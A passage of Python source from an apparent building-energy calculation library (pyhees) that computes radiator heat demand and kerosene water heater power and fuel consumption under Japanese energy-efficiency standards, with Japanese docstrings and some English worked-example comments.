"""1時間当たりの暖冷房区画iに設置された放熱器の温水熱需要 (13)
Args:
radiator(dict): 放熱器仕様
Q_max_H_rad_d_t_i(ndarray): 1時間当たりの暖冷房区画iに設置された放熱器の最大暖房出力
L_T_H_rad_d_t_i(ndarray): 1時間当たりの暖冷房区画iに設置された放熱器の暖房負荷
Returns:
ndarray: 1時間当たりの暖冷房区画iに設置された放熱器の温水熱需要
"""
# 1時間当たりの暖冷房区画iに設置された放熱器の処理暖房負荷
Q_T_H_rad_d_t_i = calc_Q_T_H_rad_d_t_i(Q_max_H_rad_d_t_i, L_T_H_rad_d_t_i)
# 1時間当たりの暖冷房区画iに設置された放熱器の熱損失
Q_loss_rad_d_t_i = calc_Q_loss_rad_d_t_i(radiator, Q_T_H_rad_d_t_i)
return Q_T_H_rad_d_t_i + Q_loss_rad_d_t_i
# ============================================================================
# 10.2 消費電力量
# ============================================================================
def calc_E_E_rad_d_t_i(i, radiator, Q_T_H_rad, Theta_SW, A_A, A_MR, A_OR, region, mode, R_type):
"""1時間当たりの暖冷房区画iに設置された放熱器の消費電力量
Args:
i(int): 暖冷房区画の番号
radiator(dict): 放熱器仕様
Q_T_H_rad(ndarray): 放熱器の処理暖房負荷
Theta_SW(ndarray): 往き温水温度 (℃)
A_A(float): 床面積の合計 (m2)
A_MR(float): 主たる居室の床面積 (m2)
A_OR(float): その他の居室の床面積 (m2)
region(int): 省エネルギー地域区分
mode(str): 運転モード 'い', 'ろ', 'は'
R_type(string): 居室の形式
Returns:
ndarray: 1時間当たりの暖冷房区画iに設置された放熱器の消費電力量
"""
if radiator['type'] == '温水暖房用パネルラジエーター' or radiator['type'] == '温水暖房用床暖房':
return np.zeros(24 * 365)
elif radiator['type'] == '温水暖房用ファンコンベクター':
A_HCZ = calc_A_HCZ_i(i, A_A, A_MR, A_OR)
return rad_fanc.calc_E_E_rad(
A_HCZ=A_HCZ,
region=region,
mode=mode,
R_type=R_type,
Theta_SW=Theta_SW,
Q_T_H_rad=Q_T_H_rad,
)
else:
raise ValueError(radiator['type'])
def calc_A_HCZ_i(i, A_A, A_MR, A_OR):
"""暖冷房区画iの床面積
Args:
i(int): 暖冷房区画の番号
A_A(float): 床面積の合計 (m2)
A_MR(float): 主たる居室の床面積 (m2)
A_OR(float): その他の居室の床面積 (m2)
Returns:
float: 暖冷房区画iの床面積
"""
return ld.get_A_HCZ_i(i, A_A, A_MR, A_OR)
# ============================================================================
# 10.3 熱損失
# ============================================================================
def calc_Q_loss_rad_d_t_i(radiator, Q_T_H_rad):
"""1時間当たりの暖冷房区画iに設置された放熱器の熱損失
Args:
radiator(dict): 放熱器仕様
Q_T_H_rad(ndarray): 放熱器の処理暖房負荷
Returns:
ndarray: 1時間当たりの暖冷房区画iに設置された放熱器の熱損失
"""
if radiator['type'] == '温水暖房用パネルラジエーター' or radiator['type'] == '温水暖房用ファンコンベクター':
return np.zeros_like(Q_T_H_rad)
elif radiator['type'] == '温水暖房用床暖房':
return rad_floor.get_Q_loss_rad(
r_up=radiator['r_up'],
Q_T_H_rad=Q_T_H_rad
)
else:
raise ValueError(radiator['type'])
# ============================================================================
# 10.4 温水供給運転率
# ============================================================================
def calc_r_WS_rad_d_t_i(A_HCZ, radiator, Q_T_H_rad, Theta_SW, region, mode, R_type):
"""放熱器の温水供給運転率
Args:
A_HCZ(float): 暖冷房区画の床面積
radiator(dict): 放熱器仕様
Q_T_H_rad(ndarray): 放熱器の処理暖房負荷
Theta_SW(ndarray): 往き温水温度 (℃)
region(int): 省エネルギー地域区分
mode(str): 運転モード 'い', 'ろ', 'は'
R_type(string): 居室の形式
Returns:
ndarray: 放熱器の温水供給運転率
"""
if radiator['type'] == '温水暖房用パネルラジエーター':
# 温水供給運転率の計算
r_WS_rad_d_t_i = rad_panel.calc_r_WS_rad(
region=region,
mode=mode,
A_HCZ=A_HCZ,
R_type=R_type,
Theta_SW=Theta_SW,
Q_T_H_rad=Q_T_H_rad
)
elif radiator['type'] == '温水暖房用ファンコンベクター':
# 仕様の取得
q_max_FC = rad_fanc.calc_q_max_FC(region, mode, A_HCZ, R_type)
q_min_FC = rad_fanc.get_q_min_FC(q_max_FC)
Q_min_H_FC = rad_fanc.get_Q_min_H_FC(Theta_SW, q_min_FC)
# 温水供給運転率の計算
r_WS_rad_d_t_i = rad_fanc.get_r_WS_rad(
Q_min_H_FC=Q_min_H_FC,
Q_T_H_rad=Q_T_H_rad
)
elif radiator['type'] == '温水暖房用床暖房':
# 仕様の取得
A_f = rad_floor.get_A_f(A_HCZ, radiator['r_Af'])
Q_max_H_rad = rad_floor.get_Q_max_H_rad(Theta_SW, A_f)
# 温水供給運転率の計算
r_WS_rad_d_t_i = rad_floor.get_r_WS_rad(
Q_T_H_rad=Q_T_H_rad,
Q_max_H_rad=Q_max_H_rad
)
else:
raise ValueError(radiator['type'])
# 温水供給運転率が1を超える場合は1、0を下回る場合は0
r_WS_rad_d_t_i = np.clip(r_WS_rad_d_t_i, 0, 1)
return r_WS_rad_d_t_i
# ============================================================================
# 10.5 処理暖房負荷
# ============================================================================
def calc_Q_T_H_rad_d_t_i(Q_max_H_d_t_i, L_H_d_t_i):
"""1時間当たりの暖冷房区画iに設置された放熱器の処理暖房負荷
Args:
Q_max_H_d_t_i(ndarray): 日付dの時刻tにおける暖冷房区画iの1時間当たりの暖冷房区画𝑖に設置された放熱器の最大暖房出力
L_H_d_t_i(ndarray): 日付dの時刻tにおける暖冷房区画iの1時間当たりの暖房負荷(MJ/h)
Returns:
ndarray: 1時間当たりの暖冷房区画iに設置された放熱器の処理暖房負荷
"""
import pyhees.section4_1_Q
return pyhees.section4_1_Q.get_Q_T_H_d_t_i(Q_max_H_d_t_i, L_H_d_t_i)
# ============================================================================
# 10.6 最大暖房出力
# ============================================================================
def calc_Q_max_H_rad_d_t_i(radiator, A_HCZ, Theta_SW, region, mode, R_type):
"""放熱器の最大暖房出力
Args:
radiator(dict): 放熱器仕様
A_HCZ(float): 暖冷房区画の床面積
Theta_SW(ndarray): 往き温水温度 (℃)
region(int): 省エネルギー地域区分
mode(str): 運転モード 'い', 'ろ', 'は'
R_type(str): 居室の形式
Returns:
ndarray: 放熱器の最大暖房出力
"""
if radiator['type'] == '温水暖房用パネルラジエーター':
# 仕様の取得
q_max_rad = rad_panel.calc_q_max_rad(region, mode, A_HCZ, R_type)
# 最大暖房出力の計算
return rad_panel.get_Q_max_H_rad(
q_max_rad=q_max_rad,
Theta_SW=Theta_SW
)
elif radiator['type'] == '温水暖房用ファンコンベクター':
# 仕様の取得
q_max_FC = rad_fanc.calc_q_max_FC(region, mode, A_HCZ, R_type)
# 最大暖房出力の計算
return rad_fanc.calc_Q_max_H_rad(
q_max_FC=q_max_FC,
Theta_SW=Theta_SW
)
elif radiator['type'] == '温水暖房用床暖房':
# 仕様の取得
A_f = rad_floor.get_A_f(A_HCZ, radiator['r_Af'])
# 最大暖房出力の計算
return rad_floor.get_Q_max_H_rad(
A_f=A_f,
Theta_SW=Theta_SW
)
else:
raise ValueError(radiator['type'])
```
#### File: src/pyhees/section7_1_d.py
```python
import numpy as np
# ============================================================================
# D.2 消費電力量
# ============================================================================
def calc_E_E_hs_d_t(W_dash_k_d_t, W_dash_s_d_t, W_dash_w_d_t, W_dash_b1_d_t, W_dash_ba1_d_t, W_dash_b2_d_t,
theta_ex_d_Ave_d, L_dashdash_ba2_d_t):
"""1時間当たりの給湯機の消費電力量 (1)
Args:
W_dash_k_d_t(ndarray): 1時間当たりの台所水栓における節湯補正給湯量 (L/h)
W_dash_s_d_t(ndarray): 1時間当たりの浴室シャワー水栓における節湯補正給湯量 (L/h)
W_dash_w_d_t(ndarray): 1時間当たりの洗面水栓における節湯補正給湯量 (L/h)
W_dash_b1_d_t(ndarray): 1時間当たりの浴槽水栓湯はり時における節湯補正給湯量 (L/h)
W_dash_ba1_d_t(ndarray): 1時間当たりの浴槽水栓さし湯時における節湯補正給湯量 (L/h)
W_dash_b2_d_t(ndarray): 1時間当たりの浴槽追焚時における節湯補正給湯量 (L/h)
theta_ex_d_Ave_d: 日平均外気温度 (℃)
L_dashdash_ba2_d_t(ndarray): 1時間当たりの浴槽追焚時における太陽熱補正給湯熱負荷 (MJ/h)
Returns:
ndarray: 1時間当たりの給湯機の消費電力量 (kWh/h)
"""
# 待機時及び水栓給湯時の補機による消費電力量 (2)
E_E_hs_aux1_d_t = get_E_E_hs_aux1_d_t(W_dash_k_d_t, W_dash_s_d_t, W_dash_w_d_t, W_dash_b1_d_t, W_dash_ba1_d_t,
theta_ex_d_Ave_d)
# 湯はり時の補機による消費電力量 (3)
E_E_hs_aux2_d_t = calc_E_E_hs_aux2_d_t(W_dash_b2_d_t)
# 保温時の補機による消費電力量 (4)
E_E_hs_aux3_d_t = calc_E_E_hs_aux3_d_t(L_dashdash_ba2_d_t)
# 1日当たりの給湯機の消費電力量 (1)
E_E_hs_d_t = E_E_hs_aux1_d_t + E_E_hs_aux2_d_t + E_E_hs_aux3_d_t
return E_E_hs_d_t
def get_E_E_hs_aux1_d_t(W_dash_k_d_t, W_dash_s_d_t, W_dash_w_d_t, W_dash_b1_d_t, W_dash_ba1_d_t, theta_ex_d_Ave_d):
"""1時間当たりの給湯機の待機時及び水栓給湯時の補機による消費電力量 (2)
Args:
W_dash_k_d_t(ndarray): 1時間当たりの台所水栓における節湯補正給湯量 (L/h)
W_dash_s_d_t(ndarray): 1時間当たりの浴室シャワー水栓における節湯補正給湯量 (L/h)
W_dash_w_d_t(ndarray): 1時間当たりの洗面水栓における節湯補正給湯量 (L/h)
W_dash_b1_d_t(ndarray): 1時間当たりの浴槽水栓湯はり時における節湯補正給湯量 (L/h)
W_dash_ba1_d_t(ndarray): 1時間当たりの浴槽水栓さし湯時における節湯補正給湯量 (L/h)
theta_ex_d_Ave_d(ndarray): 日平均外気温度 (℃)
Returns:
ndarray: 1時間当たりの給湯機の待機時及び水栓給湯時の補機による消費電力量 (kWh/h)
"""
# 1時間当たりの給湯機の待機時及び水栓給湯時の補機による消費電力量 (2)
E_E_hs_aux1_d_t = ((-0.00235 * np.repeat(theta_ex_d_Ave_d, 24) + 0.3388) / 24
+ 0.000780 * (
W_dash_k_d_t + W_dash_s_d_t + W_dash_w_d_t + W_dash_b1_d_t + W_dash_ba1_d_t)) * 10 ** 3 / 3600
return E_E_hs_aux1_d_t
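# Rough worked example (illustrative only, not from the original source): at a daily mean
# outdoor temperature of 10 degC and a combined tap volume of 100 L/h, equation (2) gives
# ((-0.00235*10 + 0.3388)/24 + 0.000780*100) * 10**3 / 3600 ~= 0.025 kWh/h of auxiliary power.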
def calc_E_E_hs_aux2_d_t(W_dash_b2_d_t):
"""1時間当たりの給湯機の湯はり時の補機による消費電力量 (3)
Args:
W_dash_b2_d_t(ndarray): 1時間当たりの浴槽追焚時における節湯補正給湯量 (L/h)
Returns:
ndarray: 1時間当たりの給湯機の湯はり時の補機による消費電力量 (kWh/h)
"""
E_E_hs_aux2_d_t = np.zeros(24 * 365)
# 1日ごとにまとめる
W_dash_b2_d = get_W_dash_b2_d(W_dash_b2_d_t)
W_dash_b2_d = np.repeat(W_dash_b2_d, 24)
# W_dash_b2_d > 0 の場合
f = W_dash_b2_d > 0
E_E_hs_aux2_d_t[f] = (0.07 * 10 ** 3 / 3600) * W_dash_b2_d_t[f] / W_dash_b2_d[f]
return E_E_hs_aux2_d_t
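# Note (added comment): on days with bath filling, the hourly values above sum to the fixed
# daily term 0.07 * 10**3 / 3600 ~= 0.019 kWh, apportioned over the hours in proportion to
# W_dash_b2_d_t / W_dash_b2_d; days without filling remain zero.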
def calc_E_E_hs_aux3_d_t(L_dashdash_ba2_d_t):
"""1時間当たりの給湯機の保温時の補機による消費電力量 (4)
Args:
L_dashdash_ba2_d_t(ndarray): 1時間当たりの浴槽追焚時における太陽熱補正給湯熱負荷 (MJ/h)
Returns:
ndarray: 1時間当たりの給湯機の保温時の補機による消費電力量 (kWh/h)
"""
E_E_hs_aux3 = np.zeros(24 * 365)
L_dashdash_ba2_d = get_L_dashdash_ba2_d(L_dashdash_ba2_d_t)
L_dashdash_ba2_d = np.repeat(L_dashdash_ba2_d, 24)
f = (L_dashdash_ba2_d > 0)
E_E_hs_aux3[f] = (0.02102 * L_dashdash_ba2_d[f] + 0.12852) * 10 ** 3 / 3600 \
* L_dashdash_ba2_d_t[f] / L_dashdash_ba2_d[f]
return E_E_hs_aux3
# ============================================================================
# D.3 ガス消費量
# ============================================================================
def get_E_G_hs_d_t():
"""1日当たりの給湯機のガス消費量
Args:
Returns:
ndarray: 1日当たりの給湯機のガス消費量
"""
# 1日当たりの給湯機のガス消費量は0とする
return np.zeros(24 * 365)
# ============================================================================
# D.4 灯油消費量
# ============================================================================
def calc_E_K_hs_d_t(hw_type, e_rtd, e_dash_rtd, bath_function, theta_ex_d_Ave_d, L_dashdash_k_d_t, L_dashdash_s_d_t, L_dashdash_w_d_t,
L_dashdash_b1_d_t, L_dashdash_b2_d_t, L_dashdash_ba1_d_t, L_dashdash_ba2_d_t):
"""灯油消費量 (5)
Args:
hw_type(str): 給湯機/給湯温水暖房機の種類
e_rtd(float): 当該給湯機の効率
e_dash_rtd(float): 「エネルギーの使用の合理化に関する法律」に基づく「特定機器の性能の向上に関する製造事業者等の判断の基準等」(ガス温水機器)に定義される「エネルギー消費効率」
bath_function(str): ふろ機能の種類
theta_ex_d_Ave_d(ndarray): 日平均外気温度 (℃)
L_dashdash_k_d_t(ndarray): 1時間当たりの台所水栓における節湯補正給湯熱負荷 (MJ/h)
L_dashdash_s_d_t(ndarray): 1時間当たりの浴室シャワー水栓における節湯補正給湯熱負荷 (MJ/h)
L_dashdash_w_d_t(ndarray): 1時間当たりの洗面水栓における節湯補正給湯熱負荷 (MJ/h)
L_dashdash_b1_d_t(ndarray): 1時間当たりの浴槽水栓湯はり時における節湯補正給湯熱負荷 (MJ/h)
L_dashdash_b2_d_t(ndarray): 1時間当たりの浴槽追焚時における節湯補正給湯熱負荷 (MJ/h)
L_dashdash_ba1_d_t(ndarray): 1時間当たりの浴槽水栓さし湯時における節湯補正給湯熱負荷 (MJ/h)
L_dashdash_ba2_d_t(ndarray): 1時間当たりの浴槽追焚時における節湯補正給湯熱負荷 (MJ/h)
Returns:
ndarray: 1時間当たりの給湯機の灯油消費量 (MJ/h)
"""
# 効率の決定
if e_rtd == None:
if e_dash_rtd == None:
e_rtd = get_e_rtd_default(hw_type)
else:
e_rtd = get_e_rtd(e_dash_rtd)
# 1日当たりの太陽熱補正給湯熱負荷
L_dashdash_k_d = get_L_dashdash_k_d(L_dashdash_k_d_t)
L_dashdash_s_d = get_L_dashdash_s_d(L_dashdash_s_d_t)
L_dashdash_w_d = get_L_dashdash_w_d(L_dashdash_w_d_t)
L_dashdash_b1_d = get_L_dashdash_b1_d(L_dashdash_b1_d_t)
L_dashdash_b2_d = get_L_dashdash_b2_d(L_dashdash_b2_d_t)
L_dashdash_ba1_d = get_L_dashdash_ba1_d(L_dashdash_ba1_d_t)
L_dashdash_ba2_d = get_L_dashdash_ba2_d(L_dashdash_ba2_d_t)
# 日平均給湯機効率
e_k_d = get_e_k_d(e_rtd, theta_ex_d_Ave_d, L_dashdash_k_d, L_dashdash_w_d)
e_s_d = get_e_s_d(e_rtd, theta_ex_d_Ave_d, L_dashdash_s_d)
e_w_d = get_e_w_d(e_rtd, theta_ex_d_Ave_d, L_dashdash_k_d, L_dashdash_w_d)
e_b1_d = get_e_b1_d(e_rtd, theta_ex_d_Ave_d, L_dashdash_b1_d)
e_b2_d = get_e_b2_d(e_rtd, theta_ex_d_Ave_d, L_dashdash_b2_d)
e_ba1_d = get_e_ba1_d(e_rtd, theta_ex_d_Ave_d, L_dashdash_ba1_d)
e_ba2_d = get_e_ba2_d(e_rtd, theta_ex_d_Ave_d, L_dashdash_ba2_d)
e_k_d = np.repeat(e_k_d, 24)
e_s_d = np.repeat(e_s_d, 24)
e_w_d = np.repeat(e_w_d, 24)
e_b1_d = np.repeat(e_b1_d, 24)
e_b2_d = np.repeat(e_b2_d, 24)
e_ba1_d = np.repeat(e_ba1_d, 24)
e_ba2_d = np.repeat(e_ba2_d, 24)
if bath_function == '給湯単機能':
# (5a)
return L_dashdash_k_d_t / e_k_d \
+ L_dashdash_s_d_t / e_s_d \
+ L_dashdash_w_d_t / e_w_d \
+ L_dashdash_b1_d_t / e_b1_d \
+ L_dashdash_ba1_d_t / e_ba1_d
elif bath_function == 'ふろ給湯機(追焚なし)':
# (5b)
return L_dashdash_k_d_t / e_k_d \
+ L_dashdash_s_d_t / e_s_d \
+ L_dashdash_w_d_t / e_w_d \
+ L_dashdash_b2_d_t / e_b2_d \
+ L_dashdash_ba1_d_t / e_ba1_d
elif bath_function == 'ふろ給湯機(追焚あり)':
# (5c)
return L_dashdash_k_d_t / e_k_d \
+ L_dashdash_s_d_t / e_s_d \
+ L_dashdash_w_d_t / e_w_d \
+ L_dashdash_b2_d_t / e_b2_d \
+ L_dashdash_ba2_d_t / e_ba2_d
else:
raise ValueError(bath_function)
def get_e_k_d(e_rtd, theta_ex_d_Ave_d, L_dashdash_k_d, L_dashdash_w_d):
"""台所水栓の給湯使用時における日平均給湯機効率 (6a)
Args:
e_rtd(float): 当該給湯機の効率
theta_ex_d_Ave_d(ndarray): 日平均外気温度 (℃)
L_dashdash_k_d(ndarray): 1日当たりの台所水栓における太陽熱補正給湯熱負荷 (MJ/d)
L_dashdash_w_d(ndarray): 1日当たりの洗面水栓における太陽熱補正給湯熱負荷 (MJ/d)
Returns:
ndarray: 台所水栓の給湯使用時における日平均給湯機効率
"""
# 当該給湯機に対する効率の補正係数
f_hs = get_f_hs(e_rtd)
# 石油給湯機効率の回帰係数
a_std_k = get_table_d_3()[0][0]
b_std_k = get_table_d_3()[1][0]
c_std_k = get_table_d_3()[2][0]
a_k = a_std_k * f_hs # (7a)
b_k = b_std_k * f_hs # (7b)
c_k = c_std_k * f_hs # (7c)
e_k = a_k * theta_ex_d_Ave_d + b_k * (L_dashdash_k_d + L_dashdash_w_d) + c_k
return np.clip(e_k, 0.0, 1.0)
def get_e_s_d(e_rtd, theta_ex_d_Ave_d, L_dashdash_s_d):
"""浴室シャワー水栓の給湯使用時における日平均給湯機効率 (6b)
Args:
e_rtd(float): 当該給湯機の効率
theta_ex_d_Ave_d(ndarray): 日平均外気温度 (℃)
L_dashdash_s_d(ndarray): 1日当たりの浴室シャワー水栓における太陽熱補正給湯熱負荷 (MJ/d)
Returns:
ndarray: 浴室シャワー水栓における日平均給湯機効率
"""
# 当該給湯機に対する効率の補正係数
f_hs = get_f_hs(e_rtd)
# 石油給湯機効率の回帰係数
a_std_s = get_table_d_3()[0][1]
b_std_s = get_table_d_3()[1][1]
c_std_s = get_table_d_3()[2][1]
a_s = a_std_s * f_hs # (7a)
b_s = b_std_s * f_hs # (7b)
c_s = c_std_s * f_hs # (7c)
e_s = a_s * theta_ex_d_Ave_d + b_s * L_dashdash_s_d + c_s
return np.clip(e_s, 0.0, 1.0)
def get_e_w_d(e_rtd, theta_ex_d_Ave_d, L_dashdash_k_d, L_dashdash_w_d):
"""洗面水栓の給湯使用時における日平均給湯機効率 (6c)
Args:
e_rtd(float): 当該給湯機の効率
theta_ex_d_Ave_d(ndarray): 日平均外気温度 (℃)
L_dashdash_k_d(ndarray): 1日当たりの台所水栓における太陽熱補正給湯熱負荷 (MJ/d)
L_dashdash_w_d(ndarray): 1日当たりの洗面水栓における太陽熱補正給湯熱負荷 (MJ/d)
Returns:
ndarray: 洗面水栓の給湯使用時における日平均給湯機効率
"""
# 当該給湯機に対する効率の補正係数
f_hs = get_f_hs(e_rtd)
# 石油給湯機効率の回帰係数
a_std_w = get_table_d_3()[0][2]
b_std_w = get_table_d_3()[1][2]
c_std_w = get_table_d_3()[2][2]
a_w = a_std_w * f_hs # (7a)
b_w = b_std_w * f_hs # (7b)
c_w = c_std_w * f_hs # (7c)
e_w = a_w * theta_ex_d_Ave_d + b_w * (L_dashdash_k_d + L_dashdash_w_d) + c_w
return np.clip(e_w, 0.0, 1.0)
def get_e_b1_d(e_rtd, theta_ex_d_Ave_d, L_dashdash_b1_d):
"""浴槽水栓湯はり時における日平均給湯機効率 (6d)
Args:
e_rtd(float): 当該給湯機の効率
theta_ex_d_Ave_d(ndarray): 日平均外気温度 (℃)
L_dashdash_b1_d(ndarray): 1日当たりの浴槽水栓湯はり時における太陽熱補正給湯熱負荷 (MJ/d)
Returns:
ndarray: 浴槽水栓湯はり時における日平均給湯機効率
"""
# 当該給湯機に対する効率の補正係数
f_hs = get_f_hs(e_rtd)
# 石油給湯機効率の回帰係数
a_std_b1 = get_table_d_3()[0][3]
b_std_b1 = get_table_d_3()[1][3]
c_std_b1 = get_table_d_3()[2][3]
a_b1 = a_std_b1 * f_hs # (7a)
b_b1 = b_std_b1 * f_hs # (7b)
c_b1 = c_std_b1 * f_hs # (7c)
e_b1 = a_b1 * theta_ex_d_Ave_d + b_b1 * L_dashdash_b1_d + c_b1
return np.clip(e_b1, 0.0, 1.0)
def get_e_b2_d(e_rtd, theta_ex_d_Ave_d, L_dashdash_b2_d):
"""浴槽自動湯はり時における日平均給湯機効率 (6e)
Args:
e_rtd(float): 当該給湯機の効率
theta_ex_d_Ave_d(ndarray): 日平均外気温度 (℃)
L_dashdash_b2_d(ndarray): 1日当たりの浴槽自動湯はり時における太陽熱補正給湯熱負荷 (MJ/d)
Returns:
ndarray: 浴槽自動湯はり時における日平均給湯機効率
"""
# 当該給湯機に対する効率の補正係数
f_hs = get_f_hs(e_rtd)
# 石油給湯機効率の回帰係数
a_std_b2 = get_table_d_3()[0][4]
b_std_b2 = get_table_d_3()[1][4]
c_std_b2 = get_table_d_3()[2][4]
a_b2 = a_std_b2 * f_hs # (7a)
b_b2 = b_std_b2 * f_hs # (7b)
c_b2 = c_std_b2 * f_hs # (7c)
e_b2 = a_b2 * theta_ex_d_Ave_d + b_b2 * L_dashdash_b2_d + c_b2
return np.clip(e_b2, 0.0, 1.0)
def get_e_ba1_d(e_rtd, theta_ex_d_Ave_d, L_dashdash_ba1_d):
"""浴槽水さし時における日平均給湯機効率 (6f)
Args:
e_rtd(float): 当該給湯機の効率
theta_ex_d_Ave_d(ndarray): 日平均外気温度 (℃)
L_dashdash_ba1_d(ndarray): 1日当たりの浴槽水栓さし湯時における太陽熱補正給湯熱負荷 (MJ/d)
Returns:
ndarray: 浴槽水さし時における日平均給湯機効率
"""
# 当該給湯機に対する効率の補正係数
f_hs = get_f_hs(e_rtd)
# 石油給湯機効率の回帰係数
a_std_ba1 = get_table_d_3()[0][5]
b_std_ba1 = get_table_d_3()[1][5]
c_std_ba1 = get_table_d_3()[2][5]
a_ba1 = a_std_ba1 * f_hs # (7a)
b_ba1 = b_std_ba1 * f_hs # (7b)
c_ba1 = c_std_ba1 * f_hs # (7c)
e_ba1 = a_ba1 * theta_ex_d_Ave_d + b_ba1 * L_dashdash_ba1_d + c_ba1
return np.clip(e_ba1, 0.0, 1.0)
def get_e_ba2_d(e_rtd, theta_ex_d_Ave_d, L_dashdash_ba2_d):
"""浴槽追焚時における日平均給湯機効率 (6g)
Args:
e_rtd(float): 当該給湯機の効率
theta_ex_d_Ave_d(ndarray): 日平均外気温度 (℃)
L_dashdash_ba2_d(ndarray): 1日当たりの浴槽追焚時における太陽熱補正給湯熱負荷 (MJ/d)
Returns:
ndarray: 浴槽追焚時における日平均給湯機効率
"""
# 当該給湯機に対する効率の補正係数
f_hs = get_f_hs(e_rtd)
# 石油給湯機効率の回帰係数
a_std_ba2 = get_table_d_3()[0][6]
b_std_ba2 = get_table_d_3()[1][6]
c_std_ba2 = get_table_d_3()[2][6]
a_ba2 = a_std_ba2 * f_hs # (7a)
b_ba2 = b_std_ba2 * f_hs # (7b)
c_ba2 = c_std_ba2 * f_hs # (7c)
e_ba2 = a_ba2 * theta_ex_d_Ave_d + b_ba2 * L_dashdash_ba2_d + c_ba2
return np.clip(e_ba2, 0.0, 1.0)
def get_table_d_3():
"""表 D.3 石油給湯機効率の回帰係
Args:
Returns:
list: 石油給湯機効率の回帰係
"""
table_d_3 = [
(0.0005, 0.0024, 0.0005, 0.0000, 0.0000, 0.0000, 0.0062),
(0.0028, 0.0021, 0.0028, -0.0027, -0.0024, -0.0027, 0.0462),
(0.6818, 0.7560, 0.6818, 0.9026, 0.8885, 0.9026, 0.4001)
]
return table_d_3
def get_f_hs(e_rtd):
"""当該給湯機に対する効率の補正係数 (8)
Args:
e_rtd(float): 当該給湯機の効率
Returns:
float: 当該給湯機に対する効率の補正係数
"""
return (0.8669 * e_rtd + 0.091) / 0.796
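# Worked example (illustrative only): with the default efficiencies defined in
# get_e_rtd_default below, f_hs(0.819) ~= 1.006 and f_hs(0.779) ~= 0.963, i.e. the table D.3
# coefficients are scaled up by about 0.6% for the latent-heat-recovery default and down by
# about 3.7% for the conventional default.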
def get_e_rtd_default(hw_type):
"""当該給湯機の効率
Args:
hw_type(str): 給湯機/給湯温水暖房機の種類
Returns:
float: 当該給湯機の効率
"""
if hw_type in ['石油潜熱回収型給湯機', '石油潜熱回収型給湯温水暖房機']:
return 0.819
elif hw_type in ['石油従来型給湯機', '石油従来型給湯温水暖房機']:
return 0.779
else:
raise ValueError(hw_type)
def get_e_rtd(e_dash_rtd):
"""「エネルギーの使用の合理化に関する法律」に基づく「特定機器の性能の向上に関する製造事業者等の 判断の基準等」(ガス温水機器)
# に定義される「エネルギー消費効率」 から 当該給湯器の効率を取得
Args:
e_dash_rtd(float): エネルギーの使用の合理化に関する法律」に基づく「特定機器の性能の向上に関する製造事業者等の 判断の基準等」(ガス温水機器)に定義される「エネルギー消費効率」
Returns:
float: 換算された当該給湯器の効率
"""
return e_dash_rtd - 0.081
# ============================================================================
# D.5 1日当たりの太陽熱補正給湯熱負荷
# ============================================================================
def get_L_dashdash_k_d(L_dashdash_k_d_t):
"""1日当たりの台所水栓における太陽熱補正給湯熱負荷 (MJ/d)
Args:
L_dashdash_k_d_t(ndarray): 1時間当たりの台所水栓における太陽熱補正給湯熱負荷 (MJ/h)
Returns:
ndarray: 1日当たりの台所水栓における太陽熱補正給湯熱負荷 (MJ/d)
"""
return np.sum(L_dashdash_k_d_t.reshape((365, 24)), axis=1)
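# Note (added comment): the hourly series of length 24*365 is reshaped to (365, 24) and summed
# along axis=1 to obtain daily totals; the helper functions below all follow the same pattern.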
def get_L_dashdash_s_d(L_dashdash_s_d_t):
"""1日当たりの浴室シャワー水栓における太陽熱補正給湯負荷 (MJ/d)
Args:
L_dashdash_s_d_t(ndarray): 1時間当たりの浴室シャワー水栓における太陽熱補正給湯負荷 (MJ/h)
Returns:
ndarray: 1日当たりの浴室シャワー水栓における太陽熱補正給湯負荷 (MJ/d)
"""
return np.sum(L_dashdash_s_d_t.reshape((365, 24)), axis=1)
def get_L_dashdash_w_d(L_dashdash_w_d_t):
"""1日当たりの洗面水栓における太陽熱補正給湯負荷 (MJ/d)
Args:
L_dashdash_w_d_t(ndarray): 1時間当たりの洗面水栓における太陽熱補正給湯負荷 (MJ/h)
Returns:
ndarray: 1日当たりの洗面水栓における太陽熱補正給湯負荷 (MJ/d)
"""
return np.sum(L_dashdash_w_d_t.reshape((365, 24)), axis=1)
def get_L_dashdash_b1_d(L_dashdash_b1_d_t):
"""1日当たりの浴槽水栓湯はり時における太陽熱補正給湯負荷 (MJ/d)
Args:
L_dashdash_b1_d_t(ndarray): 1時間当たりの浴槽水栓湯はり時における太陽熱補正給湯負荷 (MJ/h)
Returns:
ndarray: 1日当たりの浴槽水栓湯はり時における太陽熱補正給湯負荷 (MJ/d)
"""
return np.sum(L_dashdash_b1_d_t.reshape((365, 24)), axis=1)
def get_L_dashdash_b2_d(L_dashdash_b2_d_t):
"""1日当たりの浴槽自動湯はり時における太陽熱補正給湯負荷 (MJ/d)
Args:
L_dashdash_b2_d_t(ndarray): 1時間当たりの浴槽自動湯はり時における太陽熱補正給湯負荷 (MJ/h)
Returns:
ndarray: 1日当たりの浴槽自動湯はり時における太陽熱補正給湯負荷 (MJ/d)
"""
return np.sum(L_dashdash_b2_d_t.reshape((365, 24)), axis=1)
def get_L_dashdash_ba1_d(L_dashdash_ba1_d_t):
"""1日当たりの浴槽水栓さし湯時における太陽熱補正給湯負荷 (MJ/d)
Args:
L_dashdash_ba1_d_t(ndarray): 1時間当たりの浴槽水栓さし湯時における太陽熱補正給湯負荷 (MJ/h)
Returns:
ndarray: 1日当たりの浴槽水栓さし湯時における太陽熱補正給湯負荷 (MJ/d)
"""
return np.sum(L_dashdash_ba1_d_t.reshape((365, 24)), axis=1)
def get_L_dashdash_ba2_d(L_dashdash_ba2_d_t):
"""1日当たりの浴槽追焚時における太陽熱補正給湯負荷 (MJ/d)
Args:
L_dashdash_ba2_d_t(ndarray): 1時間当たりの浴槽追焚時における太陽熱補正給湯負荷 (MJ/h)
Returns:
ndarray: 1日当たりの浴槽追焚時における太陽熱補正給湯負荷 (MJ/d)
"""
return np.sum(L_dashdash_ba2_d_t.reshape((365, 24)), axis=1)
def get_W_dash_b2_d(W_dash_b2_d_t):
"""1日当たりの浴槽追焚時における節湯補正給湯量 (L/h)
Args:
W_dash_b2_d_t(ndarray): 1時間当たりの浴槽追焚時における節湯補正給湯量 (L/h)
Returns:
ndarray: 1日当たりの浴槽追焚時における節湯補正給湯量 (L/h)
"""
return np.sum(W_dash_b2_d_t.reshape(365, 24), axis=1)
```
#### File: src/pyhees/section7_1_i.py
```python
import numpy as np
# ============================================================================
# I.2 消費電力量
# ============================================================================
def calc_E_E_hs_d_t(L_HWH, hybrid_category, theta_ex_d_Ave_d, L_dashdash_k_d_t, L_dashdash_s_d_t, L_dashdash_w_d_t,
L_dashdash_b2_d_t,
